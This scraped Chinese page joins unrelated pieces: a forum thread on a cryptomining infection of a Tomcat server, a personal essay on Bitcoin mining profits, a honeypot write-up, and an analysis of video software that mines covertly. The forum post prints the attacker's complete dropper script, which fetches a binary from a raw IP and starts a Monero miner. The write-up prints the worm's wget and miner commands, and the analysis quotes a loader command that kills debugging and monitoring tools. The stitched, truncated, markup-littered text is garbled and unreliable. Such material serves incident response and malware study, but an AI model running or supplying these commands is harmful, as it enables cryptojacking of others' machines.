您还没有登录，快捷通道只有在登录后才能使用。 还没有帐号？ 赶紧
挖矿病毒怎么排查
在线时间3小时
&&发表于: 07-06
从6月开始，服务器断断续续被植入了挖矿病毒，然后我们追踪了一部分入口。发现服务器上会不定时执行一个curl命令，这个命令的父进程是java的tomcat容器&下面是那个shell脚本的内容，现在不知道对方是怎么进来的。&&& '995')this.width='995';">&'995')this.width='995';">&& &U=http://107.150.2.61/autox&AGENT_FILE='/tmp/autox'&if command -v curl & /dev/null 2&&1; then&&&curl -s $U & $AGENT_FILE&elif command -v wget & /dev/null 2&&1; then&&&wget -q $U -O - & $AGENT_FILE&else&&&curl -s $U & $AGENT_FILE&fi&if [ ! -x $AGENT_FILE ]; then&&&chmod +x $AGENT_FILE&fi&ps -ef|grep $AGENT_FILE|grep -v grep&if [ $? -ne 0 ]; then&&&nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB -p x & /dev/null 2&&1 &&fi& & & &
在线时间1小时
&&发表于: 07-07
Re挖矿病毒怎么排查
大神是否已解决？&小弟也遇到这个问题，求教解决办法Q
在线时间3小时
&&发表于: 07-07
回 1楼q的帖子
没有解决，现在准备升级tomcat，加了防火墙，把定时任务的文件加固，然后追踪这个病毒是通过tomcat进程来执行的。
访问内容超出本站范围，不能确定是否安全
限100 字节
批量上传需要先选择文件，再选择上传
您目前还是游客，请
验证问题: 阿里云官网域名是什么？ 正确答案:
&回复后跳转到最后一页身边好多人问我，比特币挖矿是怎么回事．我妈妈也时不时转发一些BTC的负面新闻，大家对我玩比特币挖矿，都又好奇，又羡慕，又不敢．心态好的，希望也能够入门，学习．心态不好的，对我由草根程序员华丽转身，充满恶意．期待比特币价值回归到０．对于这些声音，我大体都一笑了之，不予理睬．不是不想回答，是因为要想回答这些问题，需要铺垫的知识有点太多．一两句话说不清楚．&br&&br&从２０１２年上半年开始，因为偶然的机会，我进入挖矿行业．当时完全是因为好奇．陆陆续续，挖了几千个BTC．高高低低的卖了一千多．现在以剩下的一千多个币为投资，开起了现在的小公司．专门从事可编程货币领域的研究．公司从成立的第一个月，就开始盈利．而可笑的是，作为本金的比特币,就一直放着没有动. &br&因为我不是神．我对ｂｔｃ已经到了信仰的地步．我坚信３０年内，一定会改变现有经济格局．但是．我不是神．我不能做到无动于衷．&br&我最开始也炒币．把我挖出来的币放在市场上炒来炒去．半年时间赚了２０％左右．听我说了这个话，玩比特币的人，一定会用鞋底抽我了．是的．如果还有一个机会的话，我也会对当年炒币的我，抱以鞋底大辟的．比特币涨了３０倍．我通过炒币，赚了２０％．最凄凉的是，我在去年六月１８００的时候进了一笔，然后在１２００全割仓了．亏损严重．其实，只要坚持到年底．．．．．后来，办公司需要注册资金，我卖了一些币，补仓的时候，币值又涨上去了，亏损严重．．．．一句话，我受不了了．我不再看ｂｔｃ市场了&br&&br&　　涨也好，跌也好．三年之内，我不管他了．&br&&br&　　挖矿则不一样．俗话说，有恒心者，有恒产．这个世界上又有什么东西，比傻乎乎的矿机更有恒心呢？无论你在干什么，他在忠实的给你赚钱．多也好，少也好．我要他给我赚钱．&br&&br&　　另外，斤斤计较当前的价格也是可笑可悲的．我当年买显卡，ｆｐｇａ，后来买蝴蝶，买ａｖａｌｏｎ，买蚂蚁，买显卡．到现在双挖的菊花，所有的矿机,按照当时的价格来算，都必死无疑．可是，神眷顾有恒心的人．在我故意不看市场的情况下，我也知道了我的投资都获得了巨大的回报．但是，不得不提一句，所有卖期货的，都是王八蛋！这是蝴蝶跳票三个月,我给他的总结．因为，所有的矿机定价，都不得不遵循当前价格．而我们矿工，则是在默默等待一次次核爆炸．而且，每一次都给我们惊喜．买矿机，买现货矿机！&br&&br&　　还有一个比较讨厌的原因是，我现在虽然算不上什么大户，但是也有动辄数百万的资金了．这样大的资金量，进入市场，一个波峰波谷，就有可能把我甩下去．到时候亏的是真金白银．我认识一个家伙，在高点进市场，低点退出，里外里损失了５０％的投资．如果他忍半年，就会大赚一票．可惜．．．．当他被波浪甩出去以后，就在每日祈祷币值大跌．最终没有如愿，彻底被抛下了比特币列车．&br&&br&　　挖矿，我可以轻松的购买几百万的矿机．无论币值涨跌，我不可能被抛出去．我们这些挖矿的人，大部分都有我上面所说的理论支撑．所以，无论币值涨跌，洋洋得意．偶然的，需要进矿机了，选择高位抛出一些．仅此而已．我们算的不是这百分之几.而是价格核爆炸.&br&&br&　　年前,狗币核爆了,后来,是薄荷币.近期也有几个币核爆过.我都有幸赶上了.我永远不去计算,只是静静等待.&br&&br&&br&现在怎么部署算力．&br&&br&比特币目前集中在两个算法．一个是BTC，一个是LTC。BTC 的SHA-256算法．LTC的SCRYPT算法．大部分山寨币,也构架于这二个算法.&br&&br&　　这两种算法是有很大区别的.BTC算法因为是纯数字运算.因此,一颗简单的定制芯片,就可以完成全部功能.因此,如果你有一定的芯片开发能力,有300万美金.也许不到,你就可以定制BTC算法的专用芯片.同样算力的情况下,专用芯片的成本只有普通老百姓买显卡或ｆｐｇａ的1/50.因此在最初,机构们都选择自己挖矿.而不是卖矿机.比如烤猫之类.&br&&br&　　这样,造成了一个恶劣的后果.老百姓不玩了.一个事物,价值的很大决定因素来自于认可的人群.如果没有人喜欢,玉就是一个石头而已.玩的人多了,就成为了玉.因此,这样的算法,会导致除了BTC以外其他山寨币,价格根本上不去.因此,大部分山寨币都抛弃了SHA算法.&br&&br&　　而scrypt算法,则需要一些内存.这不是一颗普通的定制芯片可以解决的了.机构部署矿机的成本,也飙升到老百姓部署算力的1/5左右.这样,很自然的,老百姓愿意去玩这样算法的币.这种算法的币.虽然没有BTC价格那么高.但是,有很多有趣的山寨币可以挖.狗币啦.兔子币啦.薄荷币啦, 很多.虽然价格便宜.但是因为挖的人不多.一天的收益反而会超过挖LTC.因此,总体而言,我现在部署的新算力,渐渐向SCRYPT算法整合了.因为,目前看,部署scrypt算法.收益比较大.升值空间也比较高&br&&br&　　还有一些其他的算法.比如,MAX币用的SHA3算法,绿币用的SCRYPT 变种..他们的算法让专业矿机失去了意义.他们的目的,就是不让专业矿机玩.而是每一个老百姓都可以玩.&br&&br&这点,我有一些不同的看法.我们挖矿的,比如我.就是为了发财,不是为了糊口.我当然希望在单位时间内,快速投资.快速回收资本.如果一个算法,不能作为大规模部署用.我是不会感兴趣的.有些算法一定要CPU来算.比如质数币. 我想投资100万,挖质数币,但是,我一个房子里,根本装不下这么多计算机.那么我就不去玩了.我敢投矿机.因为小小的一个房间,可以放下几百万投资购买的矿机.这样,我可以把资金快速部署下去.同样的空间,能投资500万,三个月赚10%和,能投资30万,三个月赚50%,你说我选择那个?&br&&br&对于那样的币,我的选择是放弃. 所以,不能让我快速部署算力的币,真的能涨么?我也持不同看法.&br&&br&我目前,已有的SHA算力,不会再增加了,新部署算力,尽量向SCYRPT算法部署.&br&我最近进货的主力菊花矿机作的很有趣.菊花矿机最开始的时候,很不稳定.于是卖矿机的代理商叫做DIGINFORCE开发了个网站,远程让矿主能在远程观察矿机的运行情况.可是,光知道有死机有什么用呢?还好后来多了一个远程重启的功能.&br&　　问题是,我买了好几百台矿机,我哪里有时间一个个的盯着?呵呵，发现矿机死机,就自动重启的功能也出来了.&br&　　后来,我又提出,几百个矿机,设置矿工也是个麻烦事情.于是,他们又增加了自动分配矿工的功能,现在还增加了一键切换矿池的功能.…&br&&br&　　我从年前的菊花公测期,就开始进货.老实说,在群里没有少骂人.其他矿工也一样 .于是,在一片唾骂声中,总算能稳定运行轻松过年了.&br&&br&　　现在,过了节以后,菊花机稳定了.反而是菊花机维护成本最低 .遗憾的是,我目前只有一个仓库,所有的矿机都放一起,必须有人值守..否则,我真打算特地为菊花机配置一个无人值守仓库.这样可以大幅度降低维护人员的成本.&br&&br&　　我一直盘算的,在偏远山区的发电站旁边,投资一个无人值守矿场,通过这样的方式,可以实现.只要电费便宜.当地政府相又支持,就可以投资..一举多得的一个好事情.有人愿意合伙吗?&br&&br&&br&挖矿目前有不少矿机可以选择. 蚂蚁,阿杰,Gridseed菊花矿机,还有国外KNC, 还有显卡等等.不少.不过我的选择目前很简单.不再部署新的BTC算力.BTC算力收益下降太快没有啥意思,而且除了挖BTC没有其他选项.而因为SHA算法芯片制造简单,全球整体算力上升太快..我没有兴趣也没有能力去加入竞争.所以,我的选择只剩下,二种:&br&&br&同时支持二种算法的Gridseed菊花矿机&br&&br&还有支持所有算法的显卡矿机.&br&&br&　　相比起来,SHA算法的矿机生命周期目前看只有不到3个月.这两种矿机都属于生命周期更长的矿机,有大堆的层出不穷的山寨币可以挖,至少90%以上的新币种可以挖吧，我的显卡和菊花最近挖了狗币,黑币,极光币,纽约币...估计这两种矿机至少还可以挖半年到一年吧.&br&&br&对计算机不熟悉的人,我不建议去折腾显卡.因为挖矿,需要LINUX系统. 每一个算法,每一种显卡,对应的挖矿程序需要自己从网上下载源代码,进行编译……说到这里,我估计一半人已经吓跑了吧?&br&&br&还有矿池配置,矿工选择等等麻烦事情一大堆.我也懒得再介绍了.&br&&br&菊花相对简单很多.wiibox网页界面很方便.而且可以远程监控,修改,控制的.因为太简单,我也懒得介绍了.群里还有高手改造了硬件和软件，使之更合适家庭部署和大规模部署，还有人专卖控制器,有人专卖定制HUB、电源等其他配件,眼看着生态环境逐渐形成了.如果是希望进入矿机一行,加入数字金融浪潮,可以试试买一套菊花.体验一下.&br&如果是有形之物的财富,比如金山,我肯定不会告诉大家的.但是,数字货币则不然.数字货币,更像光明,希望,勇气之类的无形之物,我把火种分给其他人,光明会更多.我把勇气分享出去,大家会更加有勇气.&br&&br&数字货币也一样,参与的人越多,价值越大.从短期看,也许挖的人多了,收益会下降.但是只要玩的人多了,数字货币的真正价值就一定会如同核爆炸一样膨胀开来.到时候,受益的,一定是坚定的矿工.上下翻飞的投机分子一定会被甩下来,眼看着一波又一波的行情,望洋兴叹!懊悔不已.
身边好多人问我，比特币挖矿是怎么回事．我妈妈也时不时转发一些BTC的负面新闻，大家对我玩比特币挖矿，都又好奇，又羡慕，又不敢．心态好的，希望也能够入门，学习．心态不好的，对我由草根程序员华丽转身，充满恶意．期待比特币价值回归到０．对于这些声…
&img src=&/50/v2-7f01ef55f109dc64afa3dc_b.jpg& data-rawwidth=&640& data-rawheight=&427& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&/50/v2-7f01ef55f109dc64afa3dc_r.jpg&&&p&给大家分享网络空间里发家致富的一个野路子：蠕虫挖矿，套比特币等虚拟货币。下面这是我们捕获到的真实案例，门开了一条缝，更多的请自行探索，以免有带坏嫌疑。&/p&&p&----------------- &br&&/p&&p&今天凌晨，我们的蜜网系统跳出了个有趣的字符串：&/p&&blockquote&&p&&br&&/p&&/blockquote&&p&ProtonMail！前段时间我们的分享（&a href=&/?target=http%3A//mp./s%3F__biz%3DMzA3NTEzMTUwNA%3D%3D%26mid%3D%26idx%3D1%26sn%3Daab9fd9469a02abfd477b5%26chksm%3Db3f25fee296109ebbebbdef10cfc10c3aa1a08ff3ff32df25%26scene%3D21%23wechat_redirect& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&推荐安全且匿名的邮箱 ProtonMail&i class=&icon-external&&&/i&&/a&）似乎暗示着某种巧合，这不得不引起我们的兴趣。意料之内，匿名是把双刃剑，剑的另一端，“匿名之恶”会让人性丑恶发挥到极致。&/p&&p&以前我说过，黑暗森林法则同样适用于这个网络空间：被发现即被干掉。不好意思，这次是我们“干掉”了对方。&/p&&p&上面这个字符串完整内容是：&/p&&blockquote&&p&(exec
/var/tmp/.war/1 -a cryptonight -o
stratum+tcp://&a href=&/?target=http%3A//xmr.%3A45560& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&xmr.:45560&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& -u
&& /dev/null &)&br&&/p&&/blockquote&&p&我简单解释下这条 Bash 命令：&/p&&blockquote&&p&1.&br&exec，负责执行后面的命令，细节用途自行查阅。&/p&&p&2.&br&/var/tmp/.war/1，这个文件由下面这条命令创建：&br&wget &a href=&/?target=http%3A//95.128.182.166/javascripts/minerd& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&95.128.182.166/javascri&/span&&span class=&invisible&&pts/minerd&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& -O /var/tmp/.war/1&br&&/p&&p&3.&br&1 == minerd&/p&&p&4.&br&minerd 之后的参数：&br&&b&-a cryptonight -o stratum+tcp://&a href=&/?target=http%3A//xmr.%3A45560& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&xmr.:45560&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& -u
-p x&/b&&br&目测和比特币等这类货币的挖矿有关，因为：&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 就是这样的邪恶挖矿大平台。合法存在。&br&&/p&&p&5.&br&&& /dev/null&br&无视标准输出与错误输出。&/p&&p&6.&br&最后的 &，表示这条命令放到后台执行。&/p&&p&7.&br&最外层的小括号()，表示创建一个新的 Shell。&br&&/p&&/blockquote&&p&上面的7点解释，重点看第4点就好。&/p&&p&为了确定我们的“目测”，我们用我们唯一的官方邮箱“”同样在 &a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 上注册了个账号。在这个平台深度体验一番，不得不感慨，挖矿的世界真是眼花缭乱，满地宝藏既视感。&/p&&p&这个平台上，我们发现下面这个挖矿说明链接：&/p&&blockquote&&p&&a href=&/?target=https%3A///altminers/cpuminer-multi-wolf& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Smart multicurrency mining pool & 1-click GUI miner&i class=&icon-external&&&/i&&/a&&br&&/p&&/blockquote&&p&部分区域截图如下：&/p&&img src=&/50/v2-f46baf6a86398bdc15eb62d6e3d3aeff_b.png& data-rawwidth=&759& data-rawheight=&462& class=&origin_image zh-lightbox-thumb& width=&759& data-original=&/50/v2-f46baf6a86398bdc15eb62d6e3d3aeff_r.png&&&p&红框里的内容是：&/p&&blockquote&&p&&b&minerd -a cryptonight -o stratum+tcp://&a href=&/?target=http%3A//xmr.%3A45560& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&xmr.:45560&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& -u
-p x&/b&&br&&/p&&/blockquote&&p&对比下上面的第4点，这下确定了吧？另外，这个 minerd 本身还是开源的...你可以根据自己的特殊要求修改编译。&/p&&p&好，回到开头，这个蠕虫其实不是什么新鲜玩意，传播的主要方式是通过 Linux 服务器的弱口令及一些漏洞（比如：Redis 那个未授权访问缺陷）。&br&&/p&&p&这个蠕虫感染一万台服务器，那么就有一万个挖矿节点...&/p&&p&别说运用什么 0day，就是用到一些上古时代的技术，我们也能在这个健壮又脆弱的网络空间里成为“有钱人”。&br&&/p&&p&还好，我们不是坏人。&/p&&p&-----------------&/p&&p&这个案例够清晰吧？还想看到更多的吗？经过“懒人在思考”的白话润色，保证你即使不懂技术，也能涨姿势。&/p&&p&网络空间，这个巨型大脑，真美...&br&&/p&&p&-----------------&br&微信公众号「&strong&Lazy-Tho&/strong&&strong&ug&/strong&&strong&ht&/strong&」&br&几个黑客在维护，都很懒，都想改变点什么&/p&
给大家分享网络空间里发家致富的一个野路子：蠕虫挖矿，套比特币等虚拟货币。下面这是我们捕获到的真实案例，门开了一条缝，更多的请自行探索，以免有带坏嫌疑。----------------- 今天凌晨，我们的蜜网系统跳出了个有趣的字符串： P…
截止目前来看，只有毒霸能杀诶：&a href=&///?target=http%3A//bbs.duba.net/thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&小心！“Ethash挖矿病毒”来袭，严重影响系统性能&i class=&icon-external&&&/i&&/a&&br&附带详细报告：&a href=&///?target=http%3A//bbs.duba.net/thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&“Ethash挖矿病毒”来袭，源头竟是看看影音！（内附详细分析报告）&i class=&icon-external&&&/i&&/a&&br&&img src=&/4aecba623cf31ca6bc3d5ed_b.png& data-rawheight=&300& data-rawwidth=&571& class=&origin_image zh-lightbox-thumb& width=&571& data-original=&/4aecba623cf31ca6bc3d5ed_r.png&&================================================================&br&&strong&看看影音恶意挖矿详细行为分析报告&/strong&&br&&br&&br&&br&近日，部分用户出现电脑GPU占用率高，电脑温度升高，风扇噪声增大等问题。具体现象为电脑中C盘可使用空间骤降，且在C盘Ethash文件夹内，发现存在大量的1G左右的垃圾文件；电脑闲置状态时，风扇转速增快，电脑发热增加，GPU使用率达到100%。非闲置状态时，恢复正常。经过远程调试分析发现是看看影音在后台偷偷利用用户电脑的运算资源进行以太币（一种类似比特币的数字货币）挖矿导致。&br&&img src=&/c3d4ce58233edfa015b4a7_b.png& data-rawheight=&269& data-rawwidth=&470& class=&origin_image zh-lightbox-thumb& width=&470& data-original=&/c3d4ce58233edfa015b4a7_r.png&&&br&看看影音的版本和公司信息&br&&br&安装看看影音后，会注册组件%APP_DATA%\Video Legend\RBC\Program\RBCShellExternal.dll到注册表的explorer加载项，从而开机即可加载运行，然后通过lua脚本控制，下载挖矿模块到本地利用GPU挖矿，整个流程如下图所示：&br&&img src=&/efb6fb683bdb5f2e11bb_b.png& data-rawheight=&532& data-rawwidth=&1113& class=&origin_image zh-lightbox-thumb& width=&1113& data-original=&/efb6fb683bdb5f2e11bb_r.png&&&br&看看影音挖矿行为整体流程简图&br&&br&&br&&strong&RBCShellExternal.dll分析&/strong&&br&该组件是一个商业功能模块，RBC是Remote Bussiness Control的缩写。顾名思义，这个模块可以通过远程配置来控制用户电脑上运行不同的模块，比如升级、修复、广告弹窗、推广安装等，也包括挖矿。&br&&br&RBCShellExternal.dll会通过rundll32.exe来加载模块RBCEntry.dll，并通过命令行参数来检测调试工具。&br&&img src=&/7e7c26d080fbe2d07a8736e2_b.png& data-rawheight=&295& data-rawwidth=&1019& class=&origin_image zh-lightbox-thumb& width=&1019& data-original=&/7e7c26d080fbe2d07a8736e2_r.png&&&br&加载RBCEntry.dll的命令行&br&&br&完整命令行如下：&br&rundll32.exe &%APP_DATA%\Video Legend\RBC\Program\RbcEntry.dll&, Control_RunDLL /thread /src ..\\..\\Xar\\Rbc.xar /killex /priority 0 /checktime /delay 1 /idle %d /busy %d
/debug /bkwndlist &Microsoft VHTTP AWinDBG;OllyDSmartS\t\t\t\t\t\t\t\t Spy++;SATL/MFC;任务管理器;DebugVProcess EFile MRegistry MWOllyICE;OllyDBG;Sysinternals& /bkprocesslist &fiddler.windbg.devenv.taskmgr.wireshark.\t\t\t\t\t\t\t\t\t httpanalyzer.smsniff.filemon.regmon.procmon.ollydbg.softice.cis.\t\t\t\t\t\t\t\t\t tasklist.procexp.ollyice.processspy.spyxx.winspy.cv.exe&&br&&br&参数/src指定了要加载的lua脚本模块(已打包成xar格式)，通过lua脚本来控制任务；参数/bkwndlist指定要查找的窗口标题，参数/bkprocesslist指定要查找的进程名，一旦枚举到指定的窗口或进程名，立刻结束进程，防止被用户发现。&br&&br&&br&&br&&strong&LUA脚本分析&/strong&&br&RbcEntry.dll封装了LUA引擎，加载后首先解析Rbc.xar，然后调用其中的onload.lua，启动整个脚本。Rbc.xar是任务调度模块，核心功能是从云端下载任务控制脚本并加载运行。&br&Rbc.xar解包后目录树如下：&br&Rbc.xar&br&│&br&└─layout&br&│
onload.lua&br&│&br&
└─luacode&br&
kkp.curl.lua&br&
rbc.base.lua&br&
rbc.eventsource.lua&br&
rbc.filter.lua&br&
rbc.helper.lua&br&
rbc.lua&br&
rbc.scheduler.lua&br&
rbc.setting.lua&br&
rbc.task.lua&br&
rbc.version.lua&br&&br&&br&onload.lua主要功能是加载各个脚本，代码如下：&br&&img src=&/af750f438e212a2ee9e1ade_b.png& data-rawheight=&514& data-rawwidth=&571& class=&origin_image zh-lightbox-thumb& width=&571& data-original=&/af750f438e212a2ee9e1ade_r.png&&&br&onLoad.lua加载脚本&br&&br&&br&最后加载rbc.scheduler.lua里面包含了远程配置的任务脚本url：http:/***.&a href=&///?target=http%3A///rbc/taskschedule_v1.2.dat& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/tasksche&/span&&span class=&invisible&&dule_v1.2.dat&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&&img src=&/ae25a45ca712bbfbab919_b.png& data-rawheight=&394& data-rawwidth=&772& class=&origin_image zh-lightbox-thumb& width=&772& data-original=&/ae25a45ca712bbfbab919_r.png&&&br&rbc.scheduler.lua调度脚本&br&&br&从各个函数名称可以看出，该脚本是主要功能是调度任务的运行。而脚本taskschedule_v1.2.dat则是真正的任务脚本。&br&taskschedule_v1.2.dat中配置了各种任务的参数，其中挖矿任务的参数配置块如下：&br&&br&&img src=&/9e319fb40382_b.png& data-rawheight=&426& data-rawwidth=&772& class=&origin_image zh-lightbox-thumb& width=&772& data-original=&/9e319fb40382_r.png&&&br&挖矿任务脚本的参数配置块&br&&br&&br&其中link就是该任务模块的下载地址，通常是xar包；frequency是执行频率；googleid和cnzzid是活跃统计标识。configurl是脚本里面使用的远程配置，主要是挖矿DLL模块的下载地址和MD5，具体内容请看下文。&br&&br&&br&任务模块下载后保存在%APP_DATA%\Video Legend\RBC\Task目录下：&br&&img src=&/87e98dcc86a0f964fe9cb056d8e320b1_b.png& data-rawheight=&475& data-rawwidth=&517& class=&origin_image zh-lightbox-thumb& width=&517& data-original=&/87e98dcc86a0f964fe9cb056d8e320b1_r.png&&&br&%APP_DATA%\Video Legend\RBC\Task下生成的各任务目录&br&&br&整理所有任务URL，如下：&br&http:// ***.&a href=&///?target=http%3A///rbc/fixrbclaunch_v1.2.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/fixrbcla&/span&&span class=&invisible&&unch_v1.2.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/startip_v3.2.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/startip_&/span&&span class=&invisible&&v3.2.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/upkkp_v1.20.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/upkkp_v1&/span&&span class=&invisible&&.20.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/uprbc_v1.11.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/uprbc_v1&/span&&span class=&invisible&&.11.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/uprbcxar_v1.1.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/uprbcxar&/span&&span class=&invisible&&_v1.1.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/checkintegrity_v1.9.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/checkint&/span&&span class=&invisible&&egrity_v1.9.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/arkkp_v5.2.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/arkkp_v5&/span&&span class=&invisible&&.2.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/aikkp_v6.1.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/aikkp_v6&/span&&span class=&invisible&&.1.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/arfix_v1.0.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/arfix_v1&/span&&span class=&invisible&&.0.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/dc_fixplugin_v4.2.lua& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/dc_fixpl&/span&&span class=&invisible&&ugin_v4.2.lua&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/fixplugin_v12.0.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/fixplugi&/span&&span class=&invisible&&n_v12.0.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/fixplugin_v11.5.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/fixplugi&/span&&span class=&invisible&&n_v11.5.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/launchkkp_v10.1.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/launchkk&/span&&span class=&invisible&&p_v10.1.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/launchkkp_v20.1.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/launchkk&/span&&span class=&invisible&&p_v20.1.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/rbctip_v5.10.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/rbctip_v&/span&&span class=&invisible&&5.10.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/newstip_v2.21.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/newstip_&/span&&span class=&invisible&&v2.21.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/rbcbiz_v3.3.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/rbcbiz_v&/span&&span class=&invisible&&3.3.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/rbcbizlite_v1.3.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/rbcbizli&/span&&span class=&invisible&&te_v1.3.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/biztask_v2.1.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/biztask_&/span&&span class=&invisible&&v2.1.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/fixpusher_v1.3.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/fixpushe&/span&&span class=&invisible&&r_v1.3.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/dc_task_v5.3.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/dc_task_&/span&&span class=&invisible&&v5.3.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/partnerlink_v2.2.cab& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/partnerl&/span&&span class=&invisible&&ink_v2.2.cab&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/partnerdll_v2.11.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/partnerd&/span&&span class=&invisible&&ll_v2.11.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/arbrowserlink_v2.9.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span 